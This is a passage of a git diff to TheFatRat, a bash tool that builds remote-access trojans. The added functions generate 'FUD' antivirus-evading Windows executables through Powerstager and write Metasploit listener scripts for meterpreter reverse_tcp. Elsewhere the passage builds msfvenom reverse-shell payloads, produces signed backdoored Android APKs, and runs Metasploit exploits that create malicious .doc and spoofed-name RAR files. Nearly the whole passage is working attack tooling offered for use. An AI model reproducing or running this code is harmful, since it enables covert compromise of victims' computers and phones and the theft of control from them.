$distro ; + echo -e $okegreen [✔]::[Release]: $rlname ; + echo -e $okegreen [✔]::[Check User]: $USER ; + +sleep 0.5 +fi + +#Checking if user is using a local terminal or a remote shell +if [ -n "$SSH_CLIENT" ] || [ -n "$SSH_TTY" ]; then + echo -e $red [✔]::[Terminal]: remote ; +echo "" + echo -e $red "Fatrat & Setup does not work over a remote secure shell ." + echo "" +echo -e $green "If you want to Install Fatrat on a remote computer then " +echo -e $green "use a remote desktop connection like (rdesktop) or (vnc) " +echo "" +echo -e $green "Press [ENTER] key to exit" +read abor +exit 1 +else +sleep 0.5 +echo -e $okegreen [✔]::[Terminal]: local ; + case $(ps -o comm= -p $PPID) in + sshd|*/sshd) SESSION_TYPE=remote/ssh;; + esac +fi + +sleep 0.5 +#Checking internet connection by pinging hostname or ip dns (google) + ping -c 1 google.com > /dev/null 2>&1 +png="$?" + if [ $png == "0" ] +then + echo -e $okegreen [✔]::[Internet Connection]: CONNECTED!; + sleep 0.5 + cont +elif [ $png == "1" ] +then + echo -e $yellow [✔]::[Internet Connection]: LOCAL ONLY!; + chknet +elif [ $png == "2" ] +then +echo -e $red [✔]::[Internet Connection]: OFFLINE!; +chknet +fi function Stop() { #Stoped Service postgresql & apache @@ -732,6 +1218,282 @@ function Stop() { } +function pstagef() { + +# Powerstager file will be stored in main fatrat directory +# Checking if file was created + +fout="$path/output" +if [ -f $fstager ] +then +echo -e $okegreen "[✔] Your FUD Rat file was created succefully" +sleep 2 +else +echo -e $red "" +echo "[x] There was an error creating your FUD rat with Powerstager ." +echo -e $okegreen "" +echo "Press [ENTER] key to continue to return to fatrat menu" +read rmenu +clear +menu + +fi + +#File was created , now checking if file name exists in final output directory +# In case there is already a file in output dir with same name , then rename it + +ren=`shuf -i 1-1000 -n 1` +chk="$path/output/$fira.exe" +if [ -f "$chk" ]; then +mv $chk $path/output/old_$ren.exe >> $logfud 2>&1 +echo -e $yellow " " +echo "[!] FatRat Detected that you already had a previous created FUD" +echo "file in ($path/output/) with the name $fira.exe ." +echo -e $okegreen "" +echo "[✔] FatRat have renamed your old FUD Rat to old_$ren.exe" +echo "" +mv $fstager $path/output/$fira.exe >> $logfud 2>&1 +echo "" +echo -e $cyan "[*] You can find your file in : +$chk" +echo "" + +#Option to create a listener +echo -e $okegreen "Do you want to create a listener for this configuration" +echo -e $okegreen "to use in msfconsole in future ?" +echo "" +echo -ne "Choose y/n : ";tput sgr0 +read sel +case $sel in +y|Y|yes|Yes|YES) +echo "" +echo -e $green "Write the name for this config . (ex : pstager)" +echo -ne "Filename : ";tput sgr0 +read fname +if [ -z $fname ] +then +svf=$path/config/listeners/pstager.rc +rm -rf $svf >/dev/null 2>&1 +echo "use exploit/multi/handler" > $svf +echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp" >> $svf +echo "set LHOST $yourip" >> $svf +echo "set LPORT $yourport" >> $svf +echo "exploit -j" >> $svf +echo -e $okegreen "" +echo "Configuration file saved to $list/pstager.rc" +echo "" +else +svf=$path/config/listeners/$fname.rc +rm -rf $svf >/dev/null 2>&1 +echo "use exploit/multi/handler" > $svf +echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp" >> $svf +echo "set LHOST $yourip" >> $svf +echo "set LPORT $yourport" >> $svf +echo "exploit -j" >> $svf +echo -e $okegreen "" +echo "Configuration file saved to $list/$fname.rc" +echo "" +fi +;; +n|N|no|No|NO) +# no msfconsole configuration option selected +echo "" +;; +*) +echo "Wrong input " +echo "" +;; +esac +else +mv $fstager $path/output/$fira.exe >> $logfud 2>&1 +echo "" +echo -e $okegreen "[*] You can find your file in +$chk" +echo "" +# No duplicate in final destination , moving FUD to final destination + +#Option to create a listener +echo -e $okegreen "Do you want to create a listener for this configuration" +echo -e $okegreen "to use in msfconsole in future ?" +echo "" +echo -ne "Choose y/n : ";tput sgr0 +read sel +case $sel in +y|Y|yes|Yes|YES) +echo "" +echo -e $green "Write the name for this config . (ex : pstager)" +echo -ne "Filename : ";tput sgr0 +read fname +if [ -z $fname ] +then +svf=$path/config/listeners/pstager.rc +rm -rf $svf >/dev/null 2>&1 +echo "use exploit/multi/handler" > $svf +echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp" >> $svf +echo "set LHOST $yourip" >> $svf +echo "set LPORT $yourport" >> $svf +echo "exploit -j" >> $svf +echo -e $okegreen "" +echo "Configuration file saved to $list/pstager.rc" +echo "" +else +svf=$path/config/listeners/$fname.rc +rm -rf $svf >/dev/null 2>&1 +echo "use exploit/multi/handler" > $svf +echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp" >> $svf +echo "set LHOST $yourip" >> $svf +echo "set LPORT $yourport" >> $svf +echo "exploit -j" >> $svf +echo -e $okegreen "" +echo "Configuration file saved to $list/$fname.rc" +echo "" +fi +;; +n|N|no|No|NO) +# no msfconsole configuration option selected +echo "" +;; +*) +echo "Wrong input " +echo "" +;; +esac +fi +echo -e $okegreen "Press [ENTER] key to return to FUDWIN menu" +read fwin +fudwin +} + +function fudwin() { +rm -rf $logfud > /dev/null 2>&1 +touch $logfud > /dev/null 2>&1 +clear +echo -e $okegreen " _______ ___ ___ ______ ___ ___ ___ ______ " +echo -e $okegreen " | _ | Y | _ \ | Y | | _ \ " +echo -e $okegreen " |. 1___|. | |. | \|. | |. |. | |" +echo -e $okegreen " |. __) |. | |. | |. / \ |. |. | |" +echo -e $okegreen " |: | |: 1 |: 1 |: |: |: | |" +echo -e $okegreen " |::.| |::.. . |::.. . /|::.|:. |::.|::.| |" +echo -e $okegreen " --- ------- ------ --- --- --- --- --- $cyan 1.0" + +echo -e $cyan "" +echo -e $cyan "Select one tool to create your Windows EXE FUD Rat " +echo -e $cyan "" +echo "" +echo -e $white "[$okegreen 1$white ]$okegreen -$yellow Powerstager 0.2 by z0noxz $okegreen(NEW)" +echo -e $white "[$okegreen 2$white ]$okegreen -$yellow Slow But Powerfull $okegreen(OLD)" +echo -e $white "[$okegreen 3$white ]$okegreen -$yellow Return to menu" +echo "" +echo -e $okegreen" ┌─["$red"TheFatRat$okegreen]──[$red~$okegreen]─["$yellow"FUDWIN$okegreen]:" + echo -ne $okegreen" └─────► " ;tput sgr0 + read fwin + +case $fwin in +1) +echo "" + spinlong + echo -e $okegreen"" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" + echo -e $yellow " Your public IP address is : $publicip" + echo -e $yellow " Your Hostname is : $hostn" + echo -e $okegreen"" +if [ ! -f "$defcon" ] +then +yourip="" +yourport="" +fi + if [ -z "$yourip" ]; then + read -p ' Set LHOST IP: ' yourip + fi + echo -e $okegreen "" + if [ -z "$yourport" ]; then + read -p ' Set LPORT: ' yourport + fi + read -p ' Please enter the base name for output files : ' fira +invalid +if [ $err == "1" ] +then +echo -e $okegreen "" +echo -n "Press [ENTER] key to return to menu ." +read inp +fudwin +fi +which i686-w64-mingw32-gcc >> $logfud 2>&1 + if [ "$?" -eq "0" ]; then +echo "" +echo -e $yellow "Select Windows Architeture target" +echo "" +echo -e $cyan "1 -$okegreen 32Bit (XP,7,Vista)" +echo -e $cyan "2 -$okegreen 64Bit (XP64,Vista,7,8,10)" +echo "" +echo -e $lightgreen "Choose (1,2)" +read choice +if [ $choice == "1" ] +then +echo -e $okegreen "[*] Builing your powerstage rat for windows with the following values" +echo "" +echo -e $yellow "Target :$okegreen Windows 32 Bit" +echo -e $yellow "Your IP/Host :$okegreen $yourip" +echo -e $yellow "Your Port :$okegreen $yourport" +echo -e $yellow "Rat Filename :$okegreen $fira" +fstager=$path/$fira +echo -e $okegreen "[*] Starting the creation of your FUD 32bit Exe" +sleep 4 +python $pstager -t win32 -o $fira -m --lhost $yourip --lport $yourport >> $logfud 2>&1 +pstagef + +elif [ $choice == "2" ] +then +echo -e $okegreen "[*] Builing your powerstage rat for windows with the following values" +echo "" +echo -e $yellow "Target :$okegreen Windows 64 Bit" +echo -e $yellow "Your IP/Host :$okegreen $yourip" +echo -e $yellow "Your Port :$okegreen $yourport" +echo -e $yellow "Rat Filename :$okegreen $fira" +fstager=$path/$fira +python $pstager -t win64 -o $fira -m --lhost $yourip --lport $yourport >> $logfud 2>&1 +pstagef + +else +fudwin +fi +fi + +which i586-mingw32msvc-gcc >> $logfud 2>&1 +if [ "$?" -eq "0" ]; then +echo "" +echo -e $okegreen "[*] Builing your powerstage rat for windows with the following values" +echo "" +echo -e $yellow "Target :$okegreen Windows 32 Bit" +echo -e $yellow "Your IP/Host :$okegreen $yourip" +echo -e $yellow "Your Port :$okegreen $yourport" +echo -e $yellow "Rat Filename :$okegreen $fira" +fstager="$path/$fira" +python $pstager -t win32 -o $fira -m --lhost $yourip --lport $yourport >> $logfud 2>&1 +pstagef +fi +;; +2) +chmod +x powerfull.sh + xterm -fa monaco -fs 13 -bg black ./powerfull.sh + clear + menu +;; +3) +clear + menu +;; +*) +clear +echo -e $red " Incorrect Number" +echo "" +sleep 2 + + fudwin +;; +esac +} function cmsfvenom() { clear @@ -773,16 +1535,26 @@ echo "" then echo "" spinlong - echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + # Show user current lanip , public ip & current hostname + + echo -e $okegreen"" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" echo -e $okegreen"" + +#checking if default lhost & lport config exists +# If config does not exists then set lhost & lport values to no value + if [ ! -f "$defcon" ] then yourip="" yourport="" fi + +#If lhost & lport values are null then popup user manual input + if [ -z "$yourip" ]; then read -p ' Set LHOST IP: ' yourip fi @@ -791,16 +1563,21 @@ fi read -p ' Set LPORT: ' yourport fi read -p ' Please enter the base name for output files : ' fira + +# Checking if user filled lhost , lport & filename with any input +# Case any of these inputs are blank then "invalid" function will popup a message to user +# and will return to msfvenom menu + invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp cmsfvenom fi - payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "linux/ppc/shell_reverse_tcp" FALSE "linux/x86/shell_reverse_tcp" FALSE "linux/x86/meterpreter/reverse_tcp" FALSE "osx/armle/shell_reverse_tcp" FALSE "osx/ppc/shell_reverse_tcp" FALSE "bsd/x86/shell/reverse_tcp" FALSE "solaris/x86/shell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 - spinlong +pldlnx + spinlong echo "" echo "" gboor @@ -816,14 +1593,14 @@ then echo -e $red "" echo "There was an error in the creation of your rat file" echo -e $okegreen "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom else echo -e $okegreen "" echo "Your rat file was created and it is stored in : $path/output/$fira.elf" echo "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom fi @@ -833,7 +1610,8 @@ fi echo "" spinlong echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -855,12 +1633,12 @@ fi if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp cmsfvenom fi - payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" FALSE "windows/powershell_bind_tcp" FALSE "windows/powershell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 - echo "" +pldwin +echo "" echo "" gboor spinlong @@ -875,14 +1653,14 @@ then echo -e $red "" echo "There was an error in the creation of your rat file" echo -e $okegreen "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom else echo -e $okegreen "" echo "Your rat file was created and it is stored in : $path/output/$fira.exe" echo "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom fi @@ -891,7 +1669,8 @@ fi echo "" spinlong echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -913,12 +1692,12 @@ fi if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp cmsfvenom fi - payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/shell/reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 - echo "" +pldand +echo "" echo "" gboor spinlong @@ -934,7 +1713,7 @@ then echo -e $red "" echo "There was a problem in the creation of your rat apk file , make sure your metasploit is running correctly" echo -e $okegreen "" -read -rsp $'Press any key to return to fatrat menu\n' -n 1 key +read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key clear menu fi @@ -942,7 +1721,9 @@ fi echo "[✔] Done!" echo "[*] Creating a Valid Certificate" sleep 1 + #Creating certificate and storing info in logfile + $keytool -genkey -v -keystore $path/temp/debug.keystore -storepass android -alias androiddebugkey -keypass android -dname "CN=Android Debug,O=Android,C=US" -keyalg RSA -keysize 2048 -validity 10000 >>$log 2>&1 cerapk=$path/temp/debug.keystore if [ ! -f "$cerapk" ] @@ -950,7 +1731,7 @@ then echo -e $red "" echo "There was a problem creating a valid certificate ." echo -e $okegreen "" -read -rsp $'Press any key to return to fatrat menu\n' -n 1 key +read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key clear menu fi @@ -960,13 +1741,27 @@ echo "[*] Signing your payload APK" sleep 1 $sign -verbose -keystore $path/temp/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA $path/backdoored/$fira.apk androiddebugkey >>$log 2>&1 echo "[✔] Done!" + +# After signing the apk file , android certificate is not needed anymore +# deleting certificate + rm $path/temp/debug.keystore sleep 1 echo "" -zenity --question --text="`printf "Do you want to create a listener for this configuration \n to use in msfconsole in future ?"`" -if [ $? = 0 ] ; then -save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="payloadapk"); -svf=$path/config/listeners/$save.rc +echo -e $okegreen "Do you want to create a listener for this configuration" +echo -e $okegreen "to use in msfconsole in future ?" +echo "" +echo -ne "Choose y/n : ";tput sgr0 +read sel +case $sel in +y|Y|yes|Yes|YES) +echo "" +echo -e $green "Write the name for this config . (ex : payloadapk)" +echo -ne "Filename : ";tput sgr0 +read fname +if [ -z $fname ] +then +svf=$path/config/listeners/payloadapk.rc rm -rf $svf >/dev/null 2>&1 echo "use exploit/multi/handler" > $svf echo "set PAYLOAD $payload" >> $svf @@ -974,9 +1769,18 @@ echo "set LHOST $yourip" >> $svf echo "set LPORT $yourport" >> $svf echo "exploit -j" >> $svf echo -e $okegreen "" -echo "Configuration file saved to $list/$save.rc" +echo "Configuration file saved to $list/payloadapk.rc" +else +svf=$path/config/listeners/$fname.rc +rm -rf $svf >/dev/null 2>&1 +echo "use exploit/multi/handler" > $svf +echo "set PAYLOAD $payload" >> $svf +echo "set LHOST $yourip" >> $svf +echo "set LPORT $yourport" >> $svf +echo "exploit -j" >> $svf +echo -e $okegreen "" +echo "Configuration file saved to $list/$fname.rc" fi - # Checking if file was created fileout="$path/backdoored/$fira.apk" if [ ! -f "$fileout" ] @@ -984,24 +1788,54 @@ then echo -e $red "" echo "There was an error in the creation of your rat file" echo -e $okegreen "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom else echo -e $okegreen "" echo "Your payload apk was created and signed , and it is located in : $fileout" echo "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom fi +;; +n|N|no|No|NO) +# Checking if file was created +fileout="$path/backdoored/$fira.apk" +if [ ! -f "$fileout" ] +then +echo -e $red "" +echo "There was an error in the creation of your rat file" +echo -e $okegreen "" +echo -ne "Press [ENTER] key to return to menu ." +read cont +cmsfvenom +else +echo -e $okegreen "" +echo "Your payload apk was created and signed , and it is located in : $fileout" +echo "" +echo -ne "Press [ENTER] key to return to menu ." +read cont +cmsfvenom +fi +;; +*) +echo "Wrong input , returning to Msfvenom menu ." +echo "" +echo -ne "Press [ENTER] key to return to menu ." +read cont +cmsfvenom +;; +esac elif test $fatrat1 == '4' then echo "" spinlong echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -1024,7 +1858,7 @@ fi if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp cmsfvenom fi @@ -1044,14 +1878,14 @@ then echo -e $red "" echo "There was an error in the creation of your rat file" echo -e $okegreen "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom else echo -e $okegreen "" echo "Your rat file was created , and it is located in : $fileout" echo "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom fi @@ -1060,7 +1894,8 @@ fi echo "" spinlong echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -1082,7 +1917,7 @@ fi if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp cmsfvenom fi @@ -1101,14 +1936,14 @@ then echo -e $red "" echo "There was an error in the creation of your rat file" echo -e $okegreen "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom else echo -e $okegreen "" echo "Your rat file was created , and it is located in : $fileout" echo "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom fi @@ -1117,7 +1952,8 @@ fi echo "" spinlong echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -1140,7 +1976,7 @@ fi if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp cmsfvenom fi @@ -1160,14 +1996,14 @@ then echo -e $red "" echo "There was an error in the creation of your rat file" echo -e $okegreen "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom else echo -e $okegreen "" echo "Your rat file was created , and it is located in : $fileout" echo "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom fi @@ -1176,7 +2012,8 @@ fi echo "" spinlong echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -1199,7 +2036,7 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp cmsfvenom fi @@ -1219,14 +2056,14 @@ then echo -e $red "" echo "There was an error in the creation of your rat file" echo -e $okegreen "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom else echo -e $okegreen "" echo "Your rat file was created , and it is located in : $fileout" echo "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom fi @@ -1235,7 +2072,8 @@ fi echo "" spinlong echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -1258,7 +2096,7 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp cmsfvenom fi @@ -1277,14 +2115,14 @@ then echo -e $red "" echo "There was an error in the creation of your rat file" echo -e $okegreen "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom else echo -e $okegreen "" echo "Your rat file was created , and it is located in : $fileout" echo "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom fi @@ -1293,7 +2131,8 @@ fi echo "" spinlong echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -1316,7 +2155,7 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp cmsfvenom fi @@ -1335,14 +2174,14 @@ then echo -e $red "" echo "There was an error in the creation of your rat file" echo -e $okegreen "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom else echo -e $okegreen "" echo "Your rat file was created , and it is located in : $fileout" echo "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom fi @@ -1351,7 +2190,8 @@ fi echo "" spinlong echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -1372,7 +2212,7 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp cmsfvenom fi @@ -1392,14 +2232,14 @@ then echo -e $red "" echo "There was an error in the creation of your rat file" echo -e $okegreen "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom else echo -e $okegreen "" echo "Your rat file was created , and it is located in : $fileout" echo "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom fi @@ -1408,7 +2248,8 @@ fi echo "" spinlong echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -1429,7 +2270,7 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp cmsfvenom fi @@ -1448,14 +2289,14 @@ then echo -e $red "" echo "There was an error in the creation of your rat file" echo -e $okegreen "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom else echo -e $okegreen "" echo "Your rat file was created , and it is located in : $fileout" echo "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom fi @@ -1465,7 +2306,8 @@ fi echo echo -e $yellow" Worked on Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] " echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -1488,22 +2330,23 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp cmsfvenom fi echo "" - payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 - spinlong + +pldwin +spinlong echo "" echo "" gboor spinlong echo "" rm -rf ~/.msf4/local/* >/dev/null 2>&1 - xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/ms12_027_mscomctl_bof; set payload $payloads ; set FILENAME $fira.doc; set lhost $yourip ; set lport $yourport; exploit; exit -y'" + xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/ms12_027_mscomctl_bof; set PAYLOAD $payload ; set FILENAME $fira.doc; set lhost $yourip ; set lport $yourport; exploit; exit -y'" echo "" - mv ~/.msf4/local/$fira.doc $path/output/$fira.doc + mv ~/.msf4/local/$fira.doc $path/output/$fira.doc >/dev/null 2>&1 echo -e $okegreen"" # Checking if file was created fileout="$path/output/$fira.doc" @@ -1512,14 +2355,14 @@ then echo -e $red "" echo "There was an error in the creation of your rat file" echo -e $okegreen "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom else echo -e $okegreen "" echo "Your rat file was created , and it is located in : $fileout" echo "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom fi @@ -1529,7 +2372,8 @@ fi echo echo -e $yellow" Worked on All Windows " echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -1551,7 +2395,7 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp cmsfvenom fi @@ -1563,7 +2407,7 @@ then fira2="stuff.txt" fi echo "" - payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 +pldwin spinlong echo "" echo "" @@ -1571,7 +2415,7 @@ fi spinlong echo "" rm -rf ~/.msf4/local/* >/dev/null 2>&1 - xterm -T " TheFatRat < RAR BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/winrar_name_spoofing; set payload $payloads; set FILENAME $fira; set SPOOF $fira2; set lhost $yourip; set lport $yourport; exploit; exit -y'" + xterm -T " TheFatRat < RAR BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/winrar_name_spoofing; set payload $payload; set FILENAME $fira; set SPOOF $fira2; set lhost $yourip; set lport $yourport; exploit; exit -y'" echo "" mv ~/.msf4/local/$fira $path/output/$fira @@ -1582,14 +2426,14 @@ then echo -e $red "" echo "There was an error in the creation of your rat file" echo -e $okegreen "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom else echo -e $okegreen "" echo "Your rat file was created , and it is located in : $fileout" echo "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom fi @@ -1637,10 +2481,11 @@ echo -e $okegreen" ============================================================ rm temp/*.rc > /dev/null 2>&1 touch "temp/meterpreter_linux.rc" echo use exploit/multi/handler > "temp/meterpreter_linux.rc" - payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "linux/ppc/shell_reverse_tcp" FALSE "linux/x86/shell_reverse_tcp" FALSE "linux/x86/meterpreter/reverse_tcp" FALSE "osx/armle/shell_reverse_tcp" FALSE "osx/ppc/shell_reverse_tcp" FALSE "bsd/x86/shell/reverse_tcp" FALSE "solaris/x86/shell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 - echo set PAYLOAD $payload >> "temp/meterpreter_linux.rc" + pldlnx + echo set PAYLOAD $payload >> 